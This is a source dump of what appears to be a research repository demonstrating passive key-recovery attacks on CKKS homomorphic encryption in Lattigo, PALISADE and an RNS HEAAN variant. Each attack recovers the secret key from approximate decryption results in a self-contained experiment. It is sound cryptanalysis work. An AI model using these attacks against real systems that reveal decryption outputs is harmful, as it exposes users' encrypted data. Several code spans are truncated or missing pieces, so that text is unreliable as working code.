aInv := ringQ.NewPolyLvl(level) 184 | InvPolyNTT(ringQ, level, ciphertext.Value()[1], aInv) // aInv is in NTT 185 | 186 | sGuess := ringQ.NewPolyLvl(level) 187 | ringQ.MulCoeffsMontgomeryLvl(level, rhs, aInv, sGuess) // sGuess is in NTT 188 | // ringQ.InvNTTLvl(level, sGuess, sGuess) 189 | 190 | s := sk.Get().CopyNew() 191 | ringQ.InvMForm(s, s) 192 | // ringQ.InvNTT(s, s) 193 | if ringQ.EqualLvl(level, sGuess, s) { 194 | fmt.Printf("Found key!\n") 195 | } else { 196 | fmt.Printf("Failed\n") 197 | } 198 | } 199 | 200 | ////////////////////////////////////////////////// 201 | // Inversion in the cyclotomic ring 202 | ////////////////////////////////////////////////// 203 | 204 | // modular exponential, taken from lattigo/utils/utils.go 205 | func modExp(x, e, p uint64, bredParams []uint64) (result uint64) { 206 | result = 1 207 | for i := e; i > 0; i >>= 1 { 208 | if i&1 == 1 { 209 | result = ring.BRed(result, x, p, bredParams) 210 | } 211 | x = ring.BRed(x, x, p, bredParams) 212 | } 213 | return result 214 | } 215 | 216 | // compute p1^{-1} in the ring r, and return the result in p2 217 | func InvPolyNTT(r *ring.Ring, level uint64, p1, p2 *ring.Poly) { 218 | for i := uint64(0); i < level+1; i++ { 219 | qi := r.Modulus[i] 220 | p1tmp, p2tmp := p1.Coeffs[i], p2.Coeffs[i] 221 | bredParams := r.BredParams[i] 222 | for j := uint64(0); j < r.N; j = j + 8 { 223 | x := (*[8]uint64)(unsafe.Pointer(&p1tmp[j])) 224 | y := (*[8]uint64)(unsafe.Pointer(&p2tmp[j])) 225 | 226 | y[0] = ring.MForm(modExp(x[0], qi-2, qi, bredParams), qi, bredParams) 227 | y[1] = ring.MForm(modExp(x[1], qi-2, qi, bredParams), qi, bredParams) 228 | y[2] = ring.MForm(modExp(x[2], qi-2, qi, bredParams), qi, bredParams) 229 | y[3] = ring.MForm(modExp(x[3], qi-2, qi, bredParams), qi, bredParams) 230 | y[4] = ring.MForm(modExp(x[4], qi-2, qi, bredParams), qi, bredParams) 231 | y[5] = ring.MForm(modExp(x[5], qi-2, qi, bredParams), qi, bredParams) 232 | y[6] = ring.MForm(modExp(x[6], qi-2, qi, bredParams), qi, bredParams) 233 | y[7] = ring.MForm(modExp(x[7], qi-2, qi, bredParams), qi, bredParams) 234 | } 235 | } 236 | } 237 | 238 | 239 | func inftyNorm(r *ring.Ring, p *ring.Poly, N uint64) *big.Int { 240 | max := new(big.Int) 241 | 242 | level := uint64(len(p.Coeffs)-1) 243 | 244 | bigintCoeffs := make([]*big.Int, N) 245 | r.PolyToBigint(p, bigintCoeffs) 246 | 247 | QBigInt := ring.NewUint(1) 248 | for i := range r.Modulus[:level+1]{ 249 | QBigInt.Mul(QBigInt, ring.NewUint(r.Modulus[i])) 250 | } 251 | 252 | QHalfBigInt := new(big.Int) 253 | QHalfBigInt.Set(QBigInt) 254 | QHalfBigInt.Rsh(QBigInt, 1) 255 | 256 | // Centers and absolute values 257 | var sign int 258 | for i := range bigintCoeffs{ 259 | sign = bigintCoeffs[i].Cmp(QHalfBigInt) 260 | if sign == 1 || sign == 0 { 261 | bigintCoeffs[i].Sub(bigintCoeffs[i], QBigInt) 262 | bigintCoeffs[i].Abs(bigintCoeffs[i]) 263 | } 264 | } 265 | 266 | for i := uint64(0); i < r.N; i++ { 267 | if bigintCoeffs[i].Cmp(max) > 0 { 268 | max = bigintCoeffs[i] 269 | } 270 | } 271 | return max 272 | } 273 | 274 | func printPoly(r *ring.Ring, p *ring.Poly, level uint64) { 275 | for i := uint64(0); i < level+1; i++ { 276 | // qi := r.Modulus[i] 277 | fmt.Printf("[%d] = %d %d %d %d...\n", r.Modulus[i], p.Coeffs[i][0], p.Coeffs[i][1], p.Coeffs[i][2], p.Coeffs[i][3]) 278 | } 279 | } 280 | 281 | func printComplex(values []complex128) { 282 | fmt.Printf("%6.10f %6.10f %6.10f %6.10f %6.10f %6.10f %6.10f %6.10f...\n", 283 | values[0], values[1], values[2], values[3], values[4], values[5], values[6], values[7]) 284 | } 285 | 286 | func f(x complex128) complex128 { 287 | return 1 / (cmplx.Exp(-x) + 1) 288 | } 289 | 290 | func round(x complex128) complex128 { 291 | var factor float64 292 | factor = 100000000 293 | a := math.Round(real(x)*factor) / factor 294 | b := math.Round(imag(x)*factor) / factor 295 | return complex(a, b) 296 | } 297 | 298 | func printDebug(params *ckks.Parameters, ciphertext *ckks.Ciphertext, valuesWant []complex128, decryptor ckks.Decryptor, encoder ckks.Encoder) (valuesTest []complex128) { 299 | valuesTest = encoder.Decode(decryptor.DecryptNew(ciphertext), params.LogSlots()) 300 | 301 | fmt.Println() 302 | fmt.Printf("Level: %d (logQ = %d)\n", ciphertext.Level(), params.LogQLvl(ciphertext.Level())) 303 | fmt.Printf("Scale: 2^%f\n", math.Log2(ciphertext.Scale())) 304 | fmt.Printf("ValuesTest: %6.10f %6.10f %6.10f %6.10f...\n", valuesTest[0], valuesTest[1], valuesTest[2], valuesTest[3]) 305 | fmt.Printf("ValuesWant: %6.10f %6.10f %6.10f %6.10f...\n", valuesWant[0], valuesWant[1], valuesWant[2], valuesWant[3]) 306 | fmt.Println() 307 | 308 | precStats := ckks.GetPrecisionStats(params, nil, nil, valuesWant, valuesTest, math.Exp2(53)) 309 | fmt.Println(precStats.String()) 310 | 311 | return 312 | } 313 | 314 | func main() { 315 | attack_sigmoid() 316 | } 317 | 318 | func maxDiff(a []complex128, b []complex128) (max float64) { 319 | max = 0 320 | for i := range a { 321 | d := a[i] - b[i] 322 | if math.Abs(real(d)) > max { 323 | max = math.Abs(real(d)) 324 | } 325 | if math.Abs(imag(d)) > max { 326 | max = math.Abs(imag(d)) 327 | } 328 | } 329 | return 330 | } 331 | 332 | -------------------------------------------------------------------------------- /src/ntl_utils.cpp: -------------------------------------------------------------------------------- 1 | #include "ntl_utils.h" 2 | 3 | #include 4 | 5 | void showVec(NTL::ZZ const* vals, long size) { 6 | std::cout << "["; 7 | std::cout << vals[0]; 8 | for (long i = 1; i < size; ++i) { 9 | std::cout << ", " << vals[i]; 10 | } 11 | std::cout << "]" << std::endl; 12 | } 13 | 14 | 15 | void showVec(NTL::ZZ_p const* vals, long size) { 16 | std::cout << "{" << NTL::ZZ_p::modulus() << "} ["; 17 | std::cout << vals[0]; 18 | for (long i = 1; i < size; ++i) { 19 | std::cout << ", " << vals[i]; 20 | } 21 | std::cout << "]" << std::endl; 22 | } 23 | 24 | void showVec(std::vector> const* vals, long size) { 25 | std::cout << "["; 26 | std::cout << (*vals)[0]; 27 | for (long i = 1; i < size; ++i) { 28 | std::cout << ", " << (*vals)[i]; 29 | } 30 | std::cout << "]" << std::endl; 31 | } 32 | 33 | NTL::ZZ getZZBal(NTL::ZZ const& zz, NTL::ZZ const& modulus) { 34 | NTL::ZZ res = zz; 35 | if (res >= modulus / 2) { 36 | res = res - modulus; 37 | } 38 | return res; 39 | } 40 | 41 | void showVecBal(NTL::ZZ_p const* vals, long size) { 42 | std::cout << "{" << NTL::ZZ_p::modulus() << "} ["; 43 | std::cout << getZZBal(NTL::rep(vals[0]), NTL::ZZ_p::modulus()); 44 | for (long i = 1; i < size; ++i) { 45 | std::cout << ", " << getZZBal(NTL::rep(vals[i]), NTL::ZZ_p::modulus()); 46 | } 47 | std::cout << "]" << std::endl; 48 | } 49 | 50 | NTL::ZZ maxElm(NTL::ZZ const* aX, int n, NTL::ZZ const& modQ) { 51 | NTL::ZZ m = NTL::ZZ::zero(); 52 | NTL::ZZ hQ = modQ / 2; 53 | for (int i=0; i= hQ) { 56 | d = d - modQ; 57 | } 58 | d = abs(d); 59 | if (m 6 | #include 7 | 8 | #include 9 | #include 10 | 11 | void showVec(NTL::ZZ const* vals, long size); 12 | void showVec(NTL::ZZ_p const* vals, long size); 13 | void showVec(std::vector> const* vals, long size); 14 | 15 | NTL::ZZ getZZBal(NTL::ZZ const& zz, NTL::ZZ const& modulus); 16 | void showVecBal(NTL::ZZ_p const* vals, long size); 17 | 18 | void showPoly(NTL::ZZ_pE const* poly, long size); 19 | void showPoly(NTL::ZZ_pX const* poly, long size); 20 | 21 | NTL::ZZ maxElm(NTL::ZZ const* aX, int n, NTL::ZZ const& modQ); 22 | 23 | #endif // NTL_UTILS_H 24 | -------------------------------------------------------------------------------- /src/palisade.h: -------------------------------------------------------------------------------- 1 | #ifndef PALISADE_UTILS 2 | #define PALISADE_UTILS 3 | // Helper functions for palisade 4 | 5 | #include "utils/inttypes.h" 6 | #include "lattice/elemparams.h" 7 | #include "lattice/ilparams.h" 8 | #include "lattice/ildcrtparams.h" 9 | #include "lattice/ilelement.h" 10 | 11 | using namespace lbcrypto; 12 | 13 | void printDCRTPoly(DCRTPoly const& p, size_t num); 14 | 15 | void printNativePoly(NativePoly const& p, size_t num); 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /src/palisade_attack.cpp: -------------------------------------------------------------------------------- 1 | // Key recovery attack against the PALISADE implementation of CKKS 2 | #include 3 | #include 4 | 5 | #include 6 | #include "eval.h" 7 | 8 | using namespace lbcrypto; 9 | 10 | // ctRes[i] = encryption of x^(2^i), where ct = encryption of x, for 0 <= i <= logDeg 11 | void evalPowerOf2(std::vector> & ctRes, 12 | CryptoContext const& cc, Ciphertext const& ct, int logDeg) { 13 | ctRes.resize(logDeg+1); 14 | 15 | ctRes[0] = ct; // x^(2^0) 16 | for (int i = 1; i <= logDeg; i++) { 17 | ctRes[i] = cc->EvalMult(ctRes[i-1], ctRes[i-1]); // x^(2^i) 18 | ctRes[i] = cc->Rescale(ctRes[i]); // keep it in depth 1 19 | } 20 | } 21 | 22 | // Assume ct = Enc(x), coeff represents a polynomial sum( coeff[i] * x^i ) 23 | void evalFunction(Ciphertext & ctRes, CryptoContext const& cc, 24 | Ciphertext const& ct, std::vector coeff, int evalDeg = -1) { 25 | int deg = evalDeg == -1 ? coeff.size()-1 : std::min((size_t)evalDeg, coeff.size() - 1); // assume coeff is not empty 26 | int logDeg = std::floor(std::log2((double)deg)); 27 | std::cout << "evalFunction " << coeff << " to degree " << deg << std::endl; 28 | std::vector> ctPow2s(logDeg+1); 29 | evalPowerOf2(ctPow2s, cc, ct, logDeg); 30 | ctRes = cc->EvalMult(ct, coeff[1]); // c_1 * x 31 | ctRes = cc->EvalAdd(ctRes, coeff[0]); // c_1 * x + c_0 32 | for (int i = 2; i <= deg; i++) { 33 | if (fabs(coeff[i]) < 1e-27) { 34 | continue; // Too small, skip this term 35 | } 36 | int k = std::floor(std::log2((double)i)); 37 | int r = i - (1 << k); // i = 2^k + r 38 | Ciphertext tmp = ctPow2s[k]; // x^(2^k) 39 | while (r > 0) { 40 | k = std::floor(std::log2((double)r)); 41 | r = r - (1 << k); 42 | tmp = cc->EvalMult(tmp, ctPow2s[k]); 43 | tmp = cc->Rescale(tmp); 44 | } 45 | tmp = cc->EvalMult(tmp, coeff[i]); 46 | ctRes = cc->EvalAdd(ctRes, tmp); 47 | } 48 | ctRes = cc->Rescale(ctRes); // rescale to depth 1 49 | } 50 | 51 | std::vector SIGMOID_COEFF = {1./2,1./4,0,-1./48,0,1./480,0,-17./80640,0,31./1451520,0}; 52 | std::vector LOG_COEFF = {0,1,-0.5,1./3,-1./4,1./5,-1./6,1./7,-1./8,1./9,-1./10}; 53 | std::vector EXP_COEFF = {1,1,0.5,1./6,1./24,1./120,1./720,1./5040,1./40320,1./362880,1./3628800 }; 54 | 55 | void evalVariance(Ciphertext & ctRes, CryptoContext const& cc, 56 | Ciphertext const& ct, uint32_t logBatchSize) { 57 | std::cout << "evalVariance size = " << (1<EvalMult(ct, ct); // x^2 59 | ctRes = cc->Rescale(ctRes); 60 | for (uint32_t i = 1; i <= logBatchSize; i++) { 61 | Ciphertext tmp = cc->EvalAtIndex(ctRes, 1 << (logBatchSize - i)); 62 | ctRes = cc->EvalAdd(ctRes, tmp); 63 | } 64 | double factor = 1.0/((double)(1 << logBatchSize)); 65 | ctRes = cc->EvalMult(ctRes, factor); // 1/batchSize * sum(x^2) 66 | ctRes = cc->Rescale(ctRes); 67 | } 68 | 69 | int attack(uint32_t scaleFactorBits = 40, // bit-length of the scaling factor 70 | uint32_t logBatchSize = 15, // Use all slots 71 | double plainBound = 1.0, // bound on the plaintext numbers 72 | int evalDeg = -1, // Max taylor poly degree to use, default to all 73 | HomomorphicComputation hc = HC_NOOP // which circuit to evaluate 74 | ) { 75 | // Setup CryptoContext 76 | uint32_t multDepth = 20; // Force the ring dimension to be 2^16 77 | uint32_t batchSize = pow(2,logBatchSize); // Number of slots 78 | RescalingTechnique rsTech = EXACTRESCALE; 79 | SecurityLevel securityLevel = HEStd_128_classic; // 128-bit secure 80 | 81 | CryptoContext cc = 82 | CryptoContextFactory::genCryptoContextCKKS( 83 | multDepth, scaleFactorBits, batchSize, securityLevel, 0, rsTech); 84 | 85 | cc->Enable(ENCRYPTION); 86 | cc->Enable(SHE); 87 | cc->Enable(LEVELEDSHE); 88 | std::cout << "CKKS scheme is using ring dimension " << cc->GetRingDimension() 89 | << ", scalingFactorBits = " << scaleFactorBits 90 | << ", slots = " << batchSize 91 | << ", plaintext size bound = " << plainBound 92 | << ", rescaling tech = " << rsTech 93 | << ", ciphertext modulus = " << cc->GetElementParams()->GetModulus() << std::endl; 94 | 95 | // Generate the public/private keys 96 | auto keys = cc->KeyGen(); 97 | // Generate the evaluation key 98 | cc->EvalMultKeyGen(keys.secretKey); 99 | 100 | if (hc == HC_VARIANCE) { 101 | // Generate the rotation keys for computing the variance 102 | std::vector rotIndexSet(logBatchSize); 103 | for (int32_t i = 0; i < logBatchSize; i++) { 104 | rotIndexSet[i] = (1 << i); 105 | } 106 | cc->EvalAtIndexKeyGen(keys.secretKey, rotIndexSet); 107 | } 108 | 109 | // The plaintext to be encrypted 110 | vector> xvec(batchSize), resVec(batchSize); 111 | randomComplexVector(xvec, batchSize, plainBound); 112 | // Encoding as plaintexts 113 | Plaintext ptxt = cc->MakeCKKSPackedPlaintext(xvec); 114 | 115 | // Encrypt the encoded vectors 116 | auto c = cc->Encrypt(keys.publicKey, ptxt); 117 | 118 | Ciphertext ctRes = c->Clone(); 119 | switch (hc) { 120 | case HC_VARIANCE : 121 | evalVariance(ctRes, cc, c, logBatchSize); 122 | break; 123 | case HC_SIGMOID : 124 | evalFunction(ctRes, cc, c, SIGMOID_COEFF, evalDeg); 125 | break; 126 | case HC_EXP : 127 | evalFunction(ctRes, cc, c, EXP_COEFF, evalDeg); 128 | break; 129 | default : 130 | ctRes = c; // noop, just copy the input ciphertext 131 | } 132 | if (rsTech == EXACTRESCALE) { 133 | cc->EvalMultMutable(ctRes,1.0); // force rescaling to depth 1 in EXACTRESCALE 134 | } 135 | 136 | // Approximate decryption 137 | Plaintext ptxtRes; 138 | cc->Decrypt(keys.secretKey, ctRes, &ptxtRes); 139 | 140 | // Decode the polynomial plaintext to complex approximate numbers 141 | shared_ptr ptxtResEncoded = std::dynamic_pointer_cast(ptxtRes); 142 | Poly ptxtResPoly = ptxtResEncoded->GetElement(); 143 | ptxtResPoly.SetFormat(COEFFICIENT); 144 | resVec = ptxtResEncoded->GetCKKSPackedValue(); 145 | 146 | // Check computation errors 147 | std::vector> ptRes(batchSize); 148 | switch (hc) { 149 | case HC_VARIANCE : 150 | evalPlainVariance(ptRes, xvec); // evalPlainFunc(ptRes, xvec, coeff, evalDeg); 151 | break; 152 | case HC_SIGMOID : 153 | evalPlainFunc(ptRes, xvec, SIGMOID_COEFF, evalDeg); 154 | break; 155 | case HC_EXP : 156 | evalPlainFunc(ptRes, xvec, EXP_COEFF, evalDeg); 157 | break; 158 | default : 159 | ptRes = xvec; // noop, just copy the plaintext input 160 | } 161 | std::cout << "true value = " << ptRes[0] << ", computation error = " << maxDiff(ptRes, resVec) 162 | << ", relative error = " << relError(ptRes, resVec) << std::endl; 163 | 164 | // Now encode the decrypted approximate numbers to polynomial 165 | std::cout << "Trying to recover secret key... encode depth = " << ctRes->GetDepth() 166 | << ", level = " << ctRes->GetLevel() 167 | << ", scalingFactor = " << std::log2(ctRes->GetScalingFactor()) << std::endl; 168 | 169 | Plaintext ptxtReEnc = cc->MakeCKKSPackedPlaintext(resVec, ctRes->GetDepth(), ctRes->GetLevel()); 170 | shared_ptr ptxtReEncEncoded = std::dynamic_pointer_cast(ptxtReEnc); 171 | ptxtReEncEncoded->Encode(); 172 | DCRTPoly ptxtReEncCRT = ptxtReEncEncoded->GetElement(); 173 | ptxtReEncCRT.SetFormat(EVALUATION); 174 | 175 | Poly ptxtReEncPoly = ptxtReEncCRT.CRTInterpolate(); 176 | ptxtReEncPoly.SetFormat(COEFFICIENT); 177 | std::cout << "m' norm bits = " << std::log2(ptxtReEncPoly.Norm()) << std::endl; 178 | Poly error = ptxtResPoly - ptxtReEncPoly; 179 | std::cout << "Encoding error = " << error.Norm() << std::endl; 180 | 181 | // Retrieve the two components of the ciphertext 182 | DCRTPoly cb = ctRes->GetElements()[0]; 183 | DCRTPoly ca = ctRes->GetElements()[1]; 184 | 185 | ca.SetFormat(EVALUATION); 186 | cb.SetFormat(EVALUATION); 187 | 188 | // Try to recover the secret key s = (e - cb) / ca 189 | DCRTPoly caInv = ca.MultiplicativeInverse(); 190 | DCRTPoly sGuess = (ptxtReEncCRT - cb) * caInv; 191 | 192 | // Retrieve the real secret key s 193 | LPPrivateKey sk(keys.secretKey); 194 | 195 | size_t towersToDrop = sk->GetPrivateElement().GetParams()->GetParams().size() - 196 | cb.GetParams()->GetParams().size(); 197 | auto s(sk->GetPrivateElement()); 198 | s.DropLastElements(towersToDrop); 199 | 200 | return (sGuess == s); 201 | } 202 | 203 | int main(int argc, char * argv[]) { 204 | int iter = 1; 205 | if (argc == 2) { 206 | iter = atoi(argv[1]); 207 | } 208 | 209 | HomomorphicComputation hc = HC_NOOP; // default just evaluate identity function 210 | uint32_t scaleFactorBits = 40; // bit-length of the scaling factor 211 | uint32_t logBatchSize = 15; // Use all slots 212 | double plainBound = 1.0; // bound on the plaintext numbers 213 | int evalDeg = -1; // Max taylor poly degree to use, default to all 214 | 215 | if (argc > 2) { 216 | hc = parseHC(argv[2]); 217 | } 218 | if (argc > 3) { 219 | uint32_t logN = atoi(argv[3]); 220 | logBatchSize = logN - 1; 221 | } 222 | if (argc > 4) { 223 | scaleFactorBits = atoi(argv[4]); 224 | } 225 | if (argc > 5) { 226 | plainBound = atof(argv[5]); 227 | } 228 | if (argc > 6) { 229 | evalDeg = atoi(argv[6]); 230 | } 231 | 232 | int success = 0; 233 | for (int i = 0; i 3 | #include 4 | 5 | using namespace lbcrypto; 6 | 7 | double truncate(double number_val, int n) { 8 | bool negative = false; 9 | if (number_val == 0) { 10 | return 0; 11 | } else if (number_val < 0) { 12 | number_val = -number_val; 13 | negative = true; 14 | } 15 | // int pre_digits = std::log10(number_val) + 1; 16 | // if (pre_digits < 17) { 17 | // int post_digits = 17 - pre_digits; 18 | // double factor = std::pow(10, post_digits); 19 | // number_val = std::round(number_val * factor) / factor; 20 | // factor = std::pow(10, n); 21 | // number_val = std::trunc(number_val * factor) / factor; 22 | // } else { 23 | // number_val = std::round(number_val); 24 | // } 25 | int pre_digits = std::ceil(std::log2(number_val)); 26 | if (pre_digits < n) { 27 | int post_digits = n - pre_digits; 28 | double factor = std::pow(2.0, post_digits); 29 | // number_val = std::round(number_val * factor) / factor; 30 | // factor = std::pow(10, n); 31 | number_val = std::trunc(number_val * factor) / factor; 32 | } else { 33 | number_val = std::round(number_val); 34 | } 35 | if (negative) { 36 | number_val = -number_val; 37 | } 38 | return number_val; 39 | } 40 | 41 | int attack(int perturbation) { 42 | // Setup CryptoContext 43 | uint32_t multDepth = 20; // For this attack the depth is <= 1 44 | uint32_t scaleFactorBits = 40; // bit-length of the scaling factor 45 | uint32_t batchSize = 8192; // For this demo we use just 8 slots 46 | 47 | SecurityLevel securityLevel = HEStd_128_classic; // HEStd_NotSet or HEStd_128_classic; // 128-bit secure 48 | 49 | CryptoContext cc = 50 | CryptoContextFactory::genCryptoContextCKKS( 51 | multDepth, scaleFactorBits, batchSize, securityLevel); // can add additional argument for ring dimension 52 | cc->Enable(ENCRYPTION); 53 | cc->Enable(SHE); 54 | 55 | std::cout << "CKKS scheme is using ring dimension " << cc->GetRingDimension() << std::endl; 56 | 57 | // Generate the public/private keys 58 | auto keys = cc->KeyGen(); 59 | // Generate the evaluation key 60 | cc->EvalMultKeyGen(keys.secretKey); 61 | // Generate the rotation key 62 | cc->EvalAtIndexKeyGen(keys.secretKey, {1, -2}); 63 | 64 | // The plaintext to be encrypted 65 | vector> x0 = {{1,0}, {5,0}, {10,0}, 66 | {100,0}, {1000,0}, {10000,0}, 67 | {100000,0}, {100000,0}}; 68 | for (double i = 1; x0.size()GetRingDimension()/2; i+=1.05) { 69 | x0.push_back({1.0/i,0}); 70 | } 71 | 72 | // Encoding as plaintexts 73 | Plaintext ptxt0 = cc->MakeCKKSPackedPlaintext(x0); 74 | 75 | // Encrypt the encoded vectors 76 | auto c = cc->Encrypt(keys.publicKey, ptxt0); 77 | 78 | // Approximate decryption 79 | Plaintext errPtxt; 80 | cc->Decrypt(keys.secretKey, c, &errPtxt); 81 | 82 | // Recover the DCRT representation by encoding the approximate plaintext 83 | shared_ptr errEncoded = std::dynamic_pointer_cast(errPtxt); 84 | 85 | // double scale = errPtxt->GetScalingFactor(); 86 | // Poly noise = errEncoded->GetElement(); 87 | // noise.SetFormat(COEFFICIENT); 88 | 89 | // Poly::Vector noiseVec = noise.GetValues(); 90 | // for (size_t i = 0; i < noise.GetLength(); i++) { 91 | // noiseVec[i] = perturbation; 92 | // } 93 | // noise.SetValues(noiseVec, COEFFICIENT); 94 | 95 | // Plaintext noisePtxt = cc->MakeCKKSPackedPlaintext(x0); 96 | // shared_ptr noiseEncoded = std::dynamic_pointer_cast(noisePtxt); 97 | // noiseEncoded->GetElement() = noise; 98 | // noiseEncoded->Decode(multDepth, scale, EXACTRESCALE); 99 | 100 | std::vector> errValue = errEncoded->GetCKKSPackedValue(); 101 | // std::vector> noiseValue = noiseEncoded->GetCKKSPackedValue(); 102 | // char * TRUNC_DIGIT = getenv("TRUNC_DIGIT"); 103 | // int trunc_digit = TRUNC_DIGIT?atoi(TRUNC_DIGIT):-1; 104 | for (size_t i = 0; i < errValue.size(); i++) { 105 | // double ere = errValue[i].real(); 106 | // double eim = errValue[i].imag(); 107 | // size_t pos = -std::round(std::log10(noiseValue[i].real())); 108 | // ere = truncate(ere, trunc_digit>0 ? trunc_digit : pos); 109 | // pos = -std::round(std::log10(noiseValue[i].imag())); 110 | // eim = truncate(eim, trunc_digit>0 ? trunc_digit : pos); 111 | // errValue[i].real(ere); 112 | // errValue[i].imag(0); // drop the imagery part 113 | } 114 | 115 | std::cout << "Encryption numbers:" << std::endl; 116 | for (size_t i = 0; i < 20 && i < x0.size(); i++) { 117 | std::cout << i << " : " << x0[i] << std::endl; 118 | } 119 | 120 | std::cout << "Use these numbers to recover key:" << std::endl; 121 | for (size_t i = 0; i < 20 && i < errValue.size(); i++) { 122 | std::cout << i << " : " << errValue[i] << std::endl; 123 | } 124 | double maxErrReal = 0; 125 | double maxErrImag = 0; 126 | for (size_t i = 0; i < x0.size(); i++) { 127 | std::complex diff = x0[i] - errValue[i]; 128 | if (fabs(diff.real()) > maxErrReal) { 129 | maxErrReal = diff.real(); 130 | } 131 | if (fabs(diff.imag()) > maxErrImag) { 132 | maxErrImag = diff.imag(); 133 | } 134 | } 135 | std::cout << "maxErr = " << log2(maxErrReal) << ", " << log2(maxErrImag) << std::endl; 136 | 137 | Plaintext errPtxt1 = cc->MakeCKKSPackedPlaintext(errValue); 138 | shared_ptr errEncoded1 = std::dynamic_pointer_cast(errPtxt1); 139 | 140 | errEncoded1->Encode(); 141 | DCRTPoly eCRT = errEncoded1->GetElement(); 142 | eCRT.SetFormat(EVALUATION); 143 | Poly ePoly = eCRT.CRTInterpolate(); 144 | ePoly.SetFormat(COEFFICIENT); 145 | { 146 | // check the difference between the approx decryption (encoded) and the perturbed poly 147 | Poly errEncodedPoly = errEncoded->GetElement(); 148 | errEncodedPoly.SetFormat(COEFFICIENT); 149 | 150 | Poly diff = ePoly - errEncodedPoly; 151 | diff.SetFormat(COEFFICIENT); 152 | std::cout << "|errEncoded - errEncoded1| = " << diff.Norm() << std::endl; 153 | } 154 | 155 | // Retrieve the two components of the ciphertext 156 | DCRTPoly cb = c->GetElements()[0]; 157 | DCRTPoly ca = c->GetElements()[1]; 158 | ca.SetFormat(EVALUATION); 159 | cb.SetFormat(EVALUATION); 160 | 161 | // Try to recover the secret key s = (e - cb) / ca 162 | DCRTPoly caInv = ca.MultiplicativeInverse(); 163 | DCRTPoly sGuess = (eCRT - cb) * caInv; 164 | 165 | // Retrieve the real secret key s 166 | LPPrivateKey sk(keys.secretKey); 167 | 168 | size_t towersToDrop = sk->GetPrivateElement().GetParams()->GetParams().size() - 169 | cb.GetParams()->GetParams().size(); 170 | auto s(sk->GetPrivateElement()); 171 | s.DropLastElements(towersToDrop); 172 | return (sGuess == s); 173 | } 174 | 175 | int main(int argc, char * argv[]) { 176 | int iter = 1; 177 | if (argc >= 2) { 178 | iter = atoi(argv[1]); 179 | } 180 | int perturbation = 0; 181 | if (argc >= 3) { 182 | perturbation = atoi(argv[2]); 183 | } 184 | int success = 0; 185 | for (int i = 0; i 4 | 5 | void printNativePoly(NativePoly const& p, size_t num) { 6 | NativePoly pc = p; 7 | pc.SetFormat(COEFFICIENT); 8 | std::cout << "Poly [" << pc.GetParams()->GetModulus() << "] " << std::endl; 9 | NativePoly::Vector const& vi = pc.GetValues(); 10 | for (size_t j = 0; j < vi.GetLength() && j < num; j++) { 11 | std::cout << vi[j] << ", "; 12 | } 13 | std::cout << std::endl; 14 | } 15 | 16 | void printDCRTPoly(DCRTPoly const& p, size_t num) { 17 | DCRTPoly pc = p; 18 | pc.SetFormat(COEFFICIENT); 19 | auto params = pc.GetParams(); 20 | std::cout << "DCRTPoly [" << params->GetModulus() << "] " << std::endl; 21 | for (size_t i = 0; i < params->GetParams().size(); i++) { 22 | auto modParam = params->GetParams()[i]; 23 | std::cout << " * [" << modParam->GetModulus() << "] "; 24 | DCRTPoly::PolyType const& pi = pc.GetElementAtIndex(i); 25 | DCRTPoly::PolyType::Vector const& vi = pi.GetValues(); 26 | for (size_t j = 0; j < vi.GetLength() && j < num; j++) { 27 | std::cout << vi[j] << ", "; 28 | } 29 | std::cout << std::endl; 30 | } 31 | } 32 | 33 | void printPoly(Poly const& p, size_t num) { 34 | Poly pc = p; 35 | pc.SetFormat(COEFFICIENT); 36 | std::cout << "Poly [" << pc.GetParams()->GetModulus() << "] " << std::endl; 37 | Poly::Vector const& vi = pc.GetValues(); 38 | for (size_t j = 0; j < vi.GetLength() && j < num; j++) { 39 | std::cout << vi[j] << ", "; 40 | } 41 | std::cout << std::endl; 42 | } 43 | 44 | 45 | -------------------------------------------------------------------------------- /src/palisade_utils.h: -------------------------------------------------------------------------------- 1 | #ifndef PALISADE_UTILS 2 | #define PALISADE_UTILS 3 | // Helper functions for palisade 4 | 5 | #include "palisadecore.h" 6 | #include "lattice/ilparams.h" 7 | #include "lattice/ildcrtparams.h" 8 | #include "lattice/poly.h" 9 | #include "lattice/dcrtpoly.h" 10 | 11 | using namespace lbcrypto; 12 | 13 | void printDCRTPoly(DCRTPoly const& p, size_t num); 14 | 15 | void printNativePoly(NativePoly const& p, size_t num); 16 | 17 | void printPoly(Poly const& p, size_t num); 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /src/rns_attack.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include "eval.h" 11 | #include "ntl_utils.h" 12 | 13 | using namespace std; 14 | 15 | // Compute the L-infty norm of a - b, where balanced representation is used 16 | uint64_t maxDiff(uint64_t const* a, uint64_t const* b, int n, uint64_t modQ) { 17 | uint64_t m = 0; 18 | uint64_t hQ = modQ / 2; 19 | int64_t ip = static_cast(modQ); // assume modQ < 2^63 20 | for (int i=0; i(a[i]) : static_cast(a[i]) - ip; 22 | int64_t ib = b[i] < hQ ? static_cast(b[i]) : static_cast(b[i]) - ip; 23 | int64_t d = std::abs(ia - ib); 24 | if (m < static_cast(d)) { 25 | m = static_cast(d); 26 | } 27 | } 28 | return m; 29 | } 30 | 31 | // Homomorphic computation 32 | void evalVariance(Scheme & scheme, Ciphertext & ct, long len, Ciphertext & ctRes) { 33 | std::cout << "Compute variance" << std::endl; 34 | ctRes = scheme.mult(ct, ct); // Enc((m*p)^2) 35 | scheme.reScaleByAndEqual(ctRes, 1); 36 | for (int i=2; i<=len; i*=2) { 37 | Ciphertext tmp = scheme.leftRotateFast(ctRes, len/i); // tmp = ctRes << len/i 38 | scheme.addAndEqual(ctRes, tmp); // ctRes += tmp 39 | } 40 | scheme.multByConstAndEqual(ctRes, 1/(double)len); 41 | scheme.reScaleByAndEqual(ctRes, 1); 42 | } 43 | 44 | void evalSigmoid(Scheme & scheme, Ciphertext & ct, int evalDeg, Ciphertext & ctRes) { 45 | std::cout << "Compute sigmoid to degree " << evalDeg << std::endl; 46 | SchemeAlgo algo(scheme); 47 | ctRes = algo.sigmoid(ct, evalDeg); 48 | } 49 | 50 | void evalExp(Scheme & scheme, Ciphertext & ct, int evalDeg, Ciphertext & ctRes) { 51 | std::cout << "Compute exponent to degree " << evalDeg << std::endl; 52 | SchemeAlgo algo(scheme); 53 | ctRes = algo.exponent(ct, evalDeg); 54 | } 55 | 56 | // Key Recovery Attack 57 | int attack(HomomorphicComputation hc, long logN, long L, long logp, double ptBound, long evalDeg) { 